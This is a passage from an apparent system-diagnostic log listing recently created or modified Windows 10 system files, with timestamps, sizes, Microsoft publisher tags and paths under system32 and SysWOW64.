2016-09-29 15:14 - 2016-09-15 09:43 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe

2016-09-29 15:14 - 2016-09-15 09:43 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys

2016-09-29 15:14 - 2016-09-15 09:43 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll

2016-09-29 15:14 - 2016-09-15 09:42 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll

2016-09-29 15:14 - 2016-09-15 09:42 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll

2016-09-29 15:14 - 2016-09-15 09:41 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll

2016-09-29 15:14 - 2016-09-15 09:41 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthA2DP.sys

2016-09-29 15:14 - 2016-09-15 09:41 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Printers.dll

2016-09-29 15:14 - 2016-09-15 09:41 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NfcRadioMedia.dll

2016-09-29 15:14 - 2016-09-15 09:40 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll

2016-09-29 15:14 - 2016-09-15 09:40 - 00194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll

2016-09-29 15:14 - 2016-09-15 09:40 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll

2016-09-29 15:14 - 2016-09-15 09:40 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll

2016-09-29 15:14 - 2016-09-15 09:39 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll

2016-09-29 15:14 - 2016-09-15 09:39 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll

2016-09-29 15:14 - 2016-09-15 09:39 - 00418304 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll

2016-09-29 15:14 - 2016-09-15 09:39 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\system32\pdh.dll

2016-09-29 15:14 - 2016-09-15 09:39 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe

2016-09-29 15:14 - 2016-09-15 09:39 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll

2016-09-29 15:14 - 2016-09-15 09:38 - 01291264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll

2016-09-29 15:14 - 2016-09-15 09:38 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll

2016-09-29 15:14 - 2016-09-15 09:38 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll

2016-09-29 15:14 - 2016-09-15 09:38 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll

2016-09-29 15:14 - 2016-09-15 09:38 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe

2016-09-29 15:14 - 2016-09-15 09:38 - 00205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe

2016-09-29 15:14 - 2016-09-15 09:38 - 00132096 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintWSDAHost.dll

2016-09-29 15:14 - 2016-09-15 09:37 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll

2016-09-29 15:14 - 2016-09-15 09:37 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll

2016-09-29 15:14 - 2016-09-15 09:37 - 00390144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll

2016-09-29 15:14 - 2016-09-15 09:37 - 00321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkUXBroker.dll

2016-09-29 15:14 - 2016-09-15 09:37 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll

2016-09-29 15:14 - 2016-09-15 09:36 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll

2016-09-29 15:14 - 2016-09-15 09:36 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll

2016-09-29 15:14 - 2016-09-15 09:36 - 00456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll

2016-09-29 15:14 - 2016-09-15 09:36 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll

2016-09-29 15:14 - 2016-09-15 09:36 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe

2016-09-29 15:14 - 2016-09-15 09:36 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll

2016-09-29 15:14 - 2016-09-15 09:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll

2016-09-29 15:14 - 2016-09-15 09:36 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovslegacy.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 00538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 00305152 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvc.dll

2016-09-29 15:14 - 2016-09-15 09:35 - 00252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll

2016-09-29 15:14 - 2016-09-15 09:34 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll

2016-09-29 15:14 - 2016-09-15 09:34 - 00560640 _____ (Microsoft Corporation) C:\WINDOWS\system32\webio.dll

2016-09-29 15:14 - 2016-09-15 09:34 - 00424960 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll

2016-09-29 15:14 - 2016-09-15 09:33 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll

2016-09-29 15:14 - 2016-09-15 09:32 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll

2016-09-29 15:14 - 2016-09-15 09:31 - 01912320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll

2016-09-29 15:14 - 2016-09-15 09:31 - 01553408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll

2016-09-29 15:14 - 2016-09-15 09:30 - 01227264 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll

2016-09-29 15:14 - 2016-09-15 09:30 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll

2016-09-29 15:14 - 2016-09-15 09:30 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll

2016-09-29 15:14 - 2016-09-15 09:30 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll

2016-09-29 15:14 - 2016-09-15 09:29 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll

2016-09-29 15:14 - 2016-09-15 09:29 - 01082368 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll

2016-09-29 15:14 - 2016-09-15 09:29 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll

2016-09-29 15:14 - 2016-09-15 09:28 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll

2016-09-29 15:14 - 2016-09-15 09:27 - 05111296 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll

2016-09-29 15:14 - 2016-09-15 09:27 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll

2016-09-29 15:14 - 2016-09-15 09:27 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll

2016-09-29 15:14 - 2016-09-15 09:27 - 00627200 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceControl.dll

2016-09-29 15:14 - 2016-09-15 09:27 - 00582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll

2016-09-29 15:14 - 2016-09-15 09:27 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll

2016-09-29 15:14 - 2016-09-15 09:27 - 00250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\discan.dll

2016-09-29 15:14 - 2016-09-15 09:27 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\manage-bde.exe

2016-09-29 15:14 - 2016-09-15 09:27 - 00171008 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvenotify.exe

2016-09-29 15:14 - 2016-09-15 09:27 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Sens.dll

2016-09-29 15:14 - 2016-09-15 09:26 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll

2016-09-29 15:14 - 2016-09-15 09:26 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll

2016-09-29 15:14 - 2016-09-15 09:26 - 00112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe

2016-09-29 15:14 - 2016-09-15 09:26 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeui.dll

2016-09-29 15:14 - 2016-09-15 09:25 - 00947200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_sr.dll

2016-09-29 15:14 - 2016-09-15 09:25 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll

2016-09-29 15:14 - 2016-09-15 09:25 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceAgent.exe

2016-09-29 15:14 - 2016-09-15 09:24 - 01080320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Ocr.dll

2016-09-29 15:14 - 2016-09-15 09:23 - 00650752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll

2016-09-29 15:14 - 2016-09-15 09:23 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll

2016-09-29 15:14 - 2016-09-15 09:22 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll

2016-09-29 15:14 - 2016-09-15 09:22 - 00960000 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll

2016-09-29 15:14 - 2016-09-15 09:21 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll

2016-09-29 15:14 - 2016-09-15 09:21 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll

2016-09-29 15:14 - 2016-09-15 09:21 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe

2016-09-29 15:14 - 2016-09-15 09:20 - 01535488 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll

2016-09-29 15:14 - 2016-09-15 09:20 - 01266176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll

2016-09-29 15:14 - 2016-09-15 09:20 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll

2016-09-29 15:14 - 2016-09-15 09:20 - 00283648 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkssvc.dll

2016-09-29 15:14 - 2016-09-15 09:19 - 01130496 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll

2016-09-29 15:14 - 2016-09-15 09:19 - 00903680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe

2016-09-29 15:14 - 2016-09-15 09:19 - 00788992 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe

2016-09-29 15:14 - 2016-09-15 09:19 - 00717824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll

2016-09-29 15:14 - 2016-09-15 09:16 - 01817088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll

2016-09-29 15:14 - 2016-09-15 09:16 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll

2016-09-29 15:14 - 2016-09-15 09:16 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SessEnv.dll

2016-09-29 15:13 - 2016-09-15 10:37 - 00402352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ws2_32.dll

2016-09-29 15:13 - 2016-09-15 10:35 - 01570680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll

2016-09-29 15:13 - 2016-09-15 10:32 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll

2016-09-29 15:13 - 2016-09-15 10:30 - 00646136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll

2016-09-29 15:13 - 2016-09-15 10:29 - 00218008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe

2016-09-29 15:13 - 2016-09-15 10:29 - 00081760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys

2016-09-29 15:13 - 2016-09-15 10:29 - 00023392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cmimcext.sys

2016-09-29 15:13 - 2016-09-15 10:28 - 00498960 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll

2016-09-29 15:13 - 2016-09-15 10:26 - 00090400 _____ (Microsoft Corporation) C:\WINDOWS\system32\devenum.dll

2016-09-29 15:13 - 2016-09-15 10:25 - 00262960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll

2016-09-29 15:13 - 2016-09-15 10:24 - 00764936 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll

2016-09-29 15:13 - 2016-09-15 10:23 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll

2016-09-29 15:13 - 2016-09-15 10:22 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll

2016-09-29 15:13 - 2016-09-15 10:22 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll

2016-09-29 15:13 - 2016-09-15 10:19 - 00361104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tsmf.dll

2016-09-29 15:13 - 2016-09-15 10:18 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll

2016-09-29 15:13 - 2016-09-15 10:18 - 01123368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll

2016-09-29 15:13 - 2016-09-15 10:18 - 00955528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll

2016-09-29 15:13 - 2016-09-15 10:18 - 00856872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfreadwrite.dll

2016-09-29 15:13 - 2016-09-15 10:18 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll

2016-09-29 15:13 - 2016-09-15 10:17 - 04311736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe

2016-09-29 15:13 - 2016-09-15 10:16 - 07219672 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll

2016-09-29 15:13 - 2016-09-15 10:16 - 02190176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys

2016-09-29 15:13 - 2016-09-15 10:16 - 01738040 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll

2016-09-29 15:13 - 2016-09-15 10:16 - 01157000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll

2016-09-29 15:13 - 2016-09-15 10:16 - 00657760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys

2016-09-29 15:13 - 2016-09-15 10:16 - 00401760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys

2016-09-29 15:13 - 2016-09-15 10:16 - 00206096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll

2016-09-29 15:13 - 2016-09-15 10:15 - 00649568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys

2016-09-29 15:13 - 2016-09-15 10:15 - 00341936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll

2016-09-29 15:13 - 2016-09-15 10:15 - 00223584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys

2016-09-29 15:13 - 2016-09-15 10:15 - 00130912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys

2016-09-29 15:13 - 2016-09-15 10:14 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe

2016-09-29 15:13 - 2016-09-15 10:14 - 00988512 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe

2016-09-29 15:13 - 2016-09-15 10:12 - 08158672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll

2016-09-29 15:13 - 2016-09-15 10:11 - 04673296 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe

2016-09-29 15:13 - 2016-09-15 10:06 - 01046880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys

2016-09-29 15:13 - 2016-09-15 10:00 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll

2016-09-29 15:13 - 2016-09-15 10:00 - 00518656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ngccredprov.dll

2016-09-29 15:13 - 2016-09-15 10:00 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll

2016-09-29 15:13 - 2016-09-15 09:58 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Background.SystemEventsBroker.dll

2016-09-29 15:13 - 2016-09-15 09:58 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.UserDeviceAssociation.dll

2016-09-29 15:13 - 2016-09-15 09:57 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll

2016-09-29 15:13 - 2016-09-15 09:57 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll

2016-09-29 15:13 - 2016-09-15 09:56 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll

2016-09-29 15:13 - 2016-09-15 09:56 - 00257536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DataExchange.dll

2016-09-29 15:13 - 2016-09-15 09:55 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll

2016-09-29 15:13 - 2016-09-15 09:55 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll

2016-09-29 15:13 - 2016-09-15 09:55 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetworkCollectionAgent.dll

2016-09-29 15:13 - 2016-09-15 09:55 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll

2016-09-29 15:13 - 2016-09-15 09:55 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll

2016-09-29 15:13 - 2016-09-15 09:55 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\biwinrt.dll

2016-09-29 15:13 - 2016-09-15 09:54 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll

2016-09-29 15:13 - 2016-09-15 09:53 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll

2016-09-29 15:13 - 2016-09-15 09:53 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll

2016-09-29 15:13 - 2016-09-15 09:52 - 01358336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll

2016-09-29 15:13 - 2016-09-15 09:52 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NaturalLanguage6.dll

2016-09-29 15:13 - 2016-09-15 09:52 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintDialogs.dll

2016-09-29 15:13 - 2016-09-15 09:52 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptngc.dll

2016-09-29 15:13 - 2016-09-15 09:49 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll

2016-09-29 15:13 - 2016-09-15 09:49 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll

2016-09-29 15:13 - 2016-09-15 09:48 - 01321472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll

2016-09-29 15:13 - 2016-09-15 09:48 - 01112576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll

2016-09-29 15:13 - 2016-09-15 09:47 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll

2016-09-29 15:13 - 2016-09-15 09:47 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Energy.dll

2016-09-29 15:13 - 2016-09-15 09:46 - 03305984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll

2016-09-29 15:13 - 2016-09-15 09:45 - 02642944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll

2016-09-29 15:13 - 2016-09-15 09:45 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll

2016-09-29 15:13 - 2016-09-15 09:44 - 00209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAC3ENC.DLL

2016-09-29 15:13 - 2016-09-15 09:43 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll

2016-09-29 15:13 - 2016-09-15 09:42 - 01220608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll

2016-09-29 15:13 - 2016-09-15 09:42 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_sr.dll

2016-09-29 15:13 - 2016-09-15 09:42 - 00492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe

2016-09-29 15:13 - 2016-09-15 09:42 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winhvr.sys

2016-09-29 15:13 - 2016-09-15 09:41 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll

2016-09-29 15:13 - 2016-09-15 09:41 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll

2016-09-29 15:13 - 2016-09-15 09:41 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Client.dll

2016-09-29 15:13 - 2016-09-15 09:41 - 00108032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Authentication.dll

2016-09-29 15:13 - 2016-09-15 09:40 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl

2016-09-29 15:13 - 2016-09-15 09:40 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll

2016-09-29 15:13 - 2016-09-15 09:40 - 00249856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthLEEnum.sys

2016-09-29 15:13 - 2016-09-15 09:40 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll

2016-09-29 15:13 - 2016-09-15 09:40 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll

2016-09-29 15:13 - 2016-09-15 09:40 - 00082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.UserDeviceAssociation.dll

2016-09-29 15:13 - 2016-09-15 09:39 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll

2016-09-29 15:13 - 2016-09-15 09:39 - 00408576 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll

2016-09-29 15:13 - 2016-09-15 09:39 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll

2016-09-29 15:13 - 2016-09-15 09:39 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll

2016-09-29 15:13 - 2016-09-15 09:39 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll

2016-09-29 15:13 - 2016-09-15 09:38 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll

2016-09-29 15:13 - 2016-09-15 09:38 - 00671232 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkCollectionAgent.dll

2016-09-29 15:13 - 2016-09-15 09:38 - 00573952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnrGidsHandler.dll

2016-09-29 15:13 - 2016-09-15 09:38 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll

2016-09-29 15:13 - 2016-09-15 09:38 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll

2016-09-29 15:13 - 2016-09-15 09:38 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll

2016-09-29 15:13 - 2016-09-15 09:38 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SerialCommunication.dll

2016-09-29 15:13 - 2016-09-15 09:38 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll

2016-09-29 15:13 - 2016-09-15 09:37 - 00690176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll

2016-09-29 15:13 - 2016-09-15 09:37 - 00568320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll

2016-09-29 15:13 - 2016-09-15 09:37 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll

2016-09-29 15:13 - 2016-09-15 09:36 - 00686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe

2016-09-29 15:13 - 2016-09-15 09:36 - 00648192 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll

2016-09-29 15:13 - 2016-09-15 09:36 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll

2016-09-29 15:13 - 2016-09-15 09:36 - 00407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll

2016-09-29 15:13 - 2016-09-15 09:36 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll

2016-09-29 15:13 - 2016-09-15 09:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll

2016-09-29 15:13 - 2016-09-15 09:36 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupugc.exe

2016-09-29 15:13 - 2016-09-15 09:35 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataExchange.dll

2016-09-29 15:13 - 2016-09-15 09:35 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\easwrt.dll

2016-09-29 15:13 - 2016-09-15 09:34 - 00441856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll

2016-09-29 15:13 - 2016-09-15 09:34 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll

2016-09-29 15:13 - 2016-09-15 09:34 - 00284160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll

